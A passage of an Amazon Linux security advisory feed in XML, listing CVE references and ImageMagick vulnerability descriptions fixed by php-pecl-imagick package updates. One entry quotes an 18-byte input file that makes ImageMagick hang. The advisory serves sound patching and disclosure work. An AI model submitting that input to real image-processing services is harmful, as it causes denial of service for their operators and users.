id="CVE-2019-12976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" title="" id="CVE-2019-12978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" title="" id="CVE-2019-12979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13133" title="" id="CVE-2019-13133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13134" title="" id="CVE-2019-13134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" title="" id="CVE-2019-13135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" title="" id="CVE-2019-13295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" title="" id="CVE-2019-13297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" title="" id="CVE-2019-13300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" title="" id="CVE-2019-13301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" title="" id="CVE-2019-13304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" title="" id="CVE-2019-13305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" title="" id="CVE-2019-13306" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" title="" id="CVE-2019-13307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" title="" id="CVE-2019-13309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" title="" id="CVE-2019-13310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" title="" id="CVE-2019-13311" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" title="" id="CVE-2019-13454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14980" title="" id="CVE-2019-14980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" title="" id="CVE-2019-14981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" title="" id="CVE-2019-15139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" title="" id="CVE-2019-15140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15141" title="" id="CVE-2019-15141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" title="" id="CVE-2019-16708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" title="" id="CVE-2019-16709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" title="" id="CVE-2019-16710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" title="" id="CVE-2019-16711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" title="" id="CVE-2019-16712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" title="" id="CVE-2019-16713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17540" title="" id="CVE-2019-17540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17541" title="" id="CVE-2019-17541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" title="" id="CVE-2019-19948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" title="" id="CVE-2019-19949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" title="" id="CVE-2019-7175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" title="" id="CVE-2019-7397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" title="" id="CVE-2019-7398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9956" title="" id="CVE-2019-9956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php71-pecl-imagick-debuginfo" version="3.4.4" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pecl-imagick-debuginfo-3.4.4-2.8.amzn1.x86_64.rpm</filename></package><package name="php71-pecl-imagick-devel" version="3.4.4" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pecl-imagick-devel-3.4.4-2.8.amzn1.x86_64.rpm</filename></package><package name="php71-pecl-imagick" version="3.4.4" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pecl-imagick-3.4.4-2.8.amzn1.x86_64.rpm</filename></package><package name="php71-pecl-imagick" version="3.4.4" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pecl-imagick-3.4.4-2.8.amzn1.i686.rpm</filename></package><package name="php71-pecl-imagick-debuginfo" version="3.4.4" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pecl-imagick-debuginfo-3.4.4-2.8.amzn1.i686.rpm</filename></package><package name="php71-pecl-imagick-devel" version="3.4.4" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pecl-imagick-devel-3.4.4-2.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1815</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1815: medium priority package update for php72-pecl-imagick</title><issued date="2023-08-21 12:14:00" /><updated date="2023-08-23 02:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9956:
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
CVE-2019-7398:
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
CVE-2019-7397:
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
CVE-2019-7175:
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
CVE-2019-19949:
An out-of-bounds read was discovered in ImageMagick when writing PNG images. An attacker may abuse this flaw to trick a victim user into downloading a malicious image file and running it through ImageMagick, causing the application to crash.
CVE-2019-19948:
A heap-based buffer overflow flaw was discovered in ImageMagick when writing SGI images with improper columns and rows properties. An attacker may trick a victim user into downloading a malicious image file and running it through ImageMagick, possibly executing code onto the victim user's system.
CVE-2019-17541:
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
CVE-2019-17540:
ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.
CVE-2019-16713:
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
CVE-2019-16712:
ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
CVE-2019-16711:
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
CVE-2019-16710:
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
CVE-2019-16709:
ImageMagick 7.0.8-35 has a memory leak in coders/dps.c, as demonstrated by XCreateImage.
CVE-2019-16708:
ImageMagick 7.0.8-35 has a memory leak in magick/xwindow.c, related to XCreateImage.
CVE-2019-15141:
WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.
CVE-2019-15140:
coders/mat.c in ImageMagick 7.0.8-43 Q16 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact by crafting a Matlab image file that is mishandled in ReadImage in MagickCore/constitute.c.
CVE-2019-15139:
The XWD image (X Window System window dumping file) parsing component in ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (application crash resulting from an out-of-bounds Read) in ReadXWDImage in coders/xwd.c by crafting a corrupted XWD image file, a different vulnerability than CVE-2019-11472.
CVE-2019-14981:
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-14980:
In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-13454:
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
CVE-2019-13311:
A flaw was found in ImageMagick, containing memory leaks of AcquireMagickMemory due to a wand/mogrify.c error. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
CVE-2019-13310:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to an error found in MagickWand/mogrify.c. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13309:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to the mishandling of the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c. It was discovered that ImageMagick does not properly release acquired memory in function MogrifyImageList() when some error conditions are met, or the "compare" option is used. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13307:
A heap-based buffer overflow was discovered in ImageMagick in the way it parses images when using the evaluate-sequence option. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13306:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13305:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced strncpy and off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13304:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced assignment. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13301:
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
CVE-2019-13300:
A heap-based buffer overflow was discovered in ImageMagick in the way it applies a value with arithmetic, relational, or logical operators to an image due to mishandling columns. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13297:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a height of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13295:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a width of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13135:
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
CVE-2019-13134:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c.
CVE-2019-13133:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
CVE-2019-12979:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
CVE-2019-12978:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
CVE-2019-12976:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the ReadPCLImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12975:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the WriteDPXImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12974:
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
CVE-2019-11598:
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
CVE-2019-11597:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
CVE-2019-11472:
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
CVE-2019-11470:
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
CVE-2019-10650:
In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
CVE-2019-10131:
An off-by-one read vulnerability was discovered in ImageMagick in the formatIPTCfromBuffer function in coders/meta.c. A local attacker may use this flaw to read beyond the end of the buffer or to crash the program.
CVE-2018-9133:
ImageMagick 7.0.7-26 Q16 has excessive iteration in the DecodeLabImage and EncodeLabImage functions (coders/tiff.c), which results in a hang (tens of minutes) with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted tiff file.
CVE-2018-8804:
WriteEPTImage in coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote attackers to cause a denial of service (MagickCore/memory.c double free and application crash) or possibly have unspecified other impact via a crafted file.
CVE-2018-20467:
In coders/bmp.c in ImageMagick before 7.0.8-16, an input file can result in an infinite loop and hang, with high CPU and memory consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-18544:
There is a memory leak in the function WriteMSLImage of coders/msl.c in ImageMagick 7.0.8-13 Q16, and the function ProcessMSLScript of coders/msl.c in GraphicsMagick before 1.3.31.
CVE-2018-16750:
In ImageMagick 7.0.7-29 and earlier, a memory leak in the formatIPTCfromBuffer function in coders/meta.c was found.
CVE-2018-16749:
In ImageMagick 7.0.7-29 and earlier, a missing NULL check in ReadOneJNGImage in coders/png.c allows an attacker to cause a denial of service (WriteBlob assertion failure and application exit) via a crafted file.
CVE-2018-16328:
In ImageMagick before 7.0.8-8, a NULL pointer dereference exists in the CheckEventLogging function in MagickCore/log.c.
CVE-2018-15607:
In ImageMagick 7.0.8-11 Q16, a tiny input file 0x50 0x36 0x36 0x36 0x36 0x4c 0x36 0x38 0x36 0x36 0x36 0x36 0x36 0x36 0x1f 0x35 0x50 0x00 can result in a hang of several minutes during which CPU and memory resources are consumed until ultimately an attempted large memory allocation fails. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-14437:
ImageMagick 7.0.8-4 has a memory leak in parse8BIM in coders/meta.c.
CVE-2018-14436:
ImageMagick 7.0.8-4 has a memory leak in ReadMIFFImage in coders/miff.c.
CVE-2018-14435:
ImageMagick 7.0.8-4 has a memory leak in DecodeImage in coders/pcd.c.
CVE-2018-14434:
ImageMagick 7.0.8-4 has a memory leak for a colormap in WriteMPCImage in coders/mpc.c.
CVE-2018-13153:
A memory leak was discovered in ImageMagick in the XMagickCommand function in animate.c file. An array of strings, named filelist, is allocated on the heap but not released in case the function ExpandFilenames returns an error code.
CVE-2018-12600:
In ImageMagick 7.0.8-3 Q16, ReadDIBImage and WriteDIBImage in coders/dib.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-12599:
In ImageMagick 7.0.8-3 Q16, ReadBMPImage and WriteBMPImage in coders/bmp.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-11656:
In ImageMagick 7.0.7-20 Q16 x86_64, a memory leak vulnerability was found in the function ReadDCMImage in coders/dcm.c, which allows attackers to cause a denial of service via a crafted DCM image file.
CVE-2018-10805:
ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
CVE-2018-10804:
ImageMagick version 7.0.7-28 contains a memory leak in WriteTIFFImage in coders/tiff.c.
CVE-2018-10177:
An infinite loop has been found in the way ImageMagick reads Multiple-image Network Graphics (MNG) data. An attacker could exploit this to cause a denial of service via crafted MNG file.
CVE-2017-18273:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadTXTImage in coders/txt.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted image file that is mishandled in a GetImageIndexInList call.
CVE-2017-18271:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadMIFFImage in coders/miff.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted MIFF image file.
CVE-2017-18254:
A memory leak vulnerability has been discovered in ImageMagick in the WriteGIFImage function of coders/gif.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-18252:
An issue was discovered in ImageMagick 7.0.7. The MogrifyImageList function in MagickWand/mogrify.c allows attackers to cause a denial of service (assertion failure and application exit in ReplaceImageInList) via a crafted file.
CVE-2017-18251:
A memory leak vulnerability has been discovered in ImageMagick in the ReadPCDImage function of coders/pcd.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-12806:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
CVE-2017-12805:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
CVE-2017-11166:
The ReadXWDImage function in coders\xwd.c in ImageMagick 7.0.5-6 has a memory leak vulnerability that can cause memory exhaustion via a crafted length (number of color-map entries) field in the header of an XWD file.
CVE-2017-1000476:
ImageMagick 7.0.7-12 Q16, a CPU exhaustion vulnerability was found in the function ReadDDSInfo in coders/dds.c, which allows attackers to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000476" title="" id="CVE-2017-1000476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11166" title="" id="CVE-2017-11166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12805" title="" id="CVE-2017-12805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12806" title="" id="CVE-2017-12806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18251" title="" id="CVE-2017-18251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18252" title="" id="CVE-2017-18252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18254" title="" id="CVE-2017-18254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18271" title="" id="CVE-2017-18271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18273" title="" id="CVE-2017-18273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10177" title="" id="CVE-2018-10177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10804" title="" id="CVE-2018-10804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10805" title="" id="CVE-2018-10805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11656" title="" id="CVE-2018-11656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12599" title="" id="CVE-2018-12599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12600" title="" id="CVE-2018-12600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13153" title="" id="CVE-2018-13153" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14434" title="" id="CVE-2018-14434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14435" title="" id="CVE-2018-14435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14436" title="" id="CVE-2018-14436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14437" title="" id="CVE-2018-14437" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15607" title="" id="CVE-2018-15607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16328" title="" id="CVE-2018-16328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16749" title="" id="CVE-2018-16749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16750" title="" id="CVE-2018-16750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18544" title="" id="CVE-2018-18544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20467" title="" id="CVE-2018-20467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8804" title="" id="CVE-2018-8804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9133" title="" id="CVE-2018-9133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10131" title="" id="CVE-2019-10131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10650" title="" id="CVE-2019-10650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" title="" id="CVE-2019-11470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" title="" id="CVE-2019-11472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" title="" id="CVE-2019-11597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" title="" id="CVE-2019-11598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" title="" id="CVE-2019-12974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" title="" id="CVE-2019-12975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" title="" id="CVE-2019-12976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" title="" id="CVE-2019-12978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" title="" id="CVE-2019-12979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13133" title="" id="CVE-2019-13133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13134" title="" id="CVE-2019-13134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" title="" id="CVE-2019-13135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" title="" id="CVE-2019-13295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" title="" id="CVE-2019-13297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" title="" id="CVE-2019-13300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" title="" id="CVE-2019-13301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" title="" id="CVE-2019-13304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" title="" id="CVE-2019-13305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" title="" id="CVE-2019-13306" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" title="" id="CVE-2019-13307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" title="" id="CVE-2019-13309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" title="" id="CVE-2019-13310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" title="" id="CVE-2019-13311" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" title="" id="CVE-2019-13454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14980" title="" id="CVE-2019-14980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" title="" id="CVE-2019-14981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" title="" id="CVE-2019-15139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" title="" id="CVE-2019-15140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15141" title="" id="CVE-2019-15141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" title="" id="CVE-2019-16708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" title="" id="CVE-2019-16709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" title="" id="CVE-2019-16710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" title="" id="CVE-2019-16711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" title="" id="CVE-2019-16712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" title="" id="CVE-2019-16713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17540" title="" id="CVE-2019-17540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17541" title="" id="CVE-2019-17541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" title="" id="CVE-2019-19948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" title="" id="CVE-2019-19949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" title="" id="CVE-2019-7175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" title="" id="CVE-2019-7397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" title="" id="CVE-2019-7398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9956" title="" id="CVE-2019-9956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package 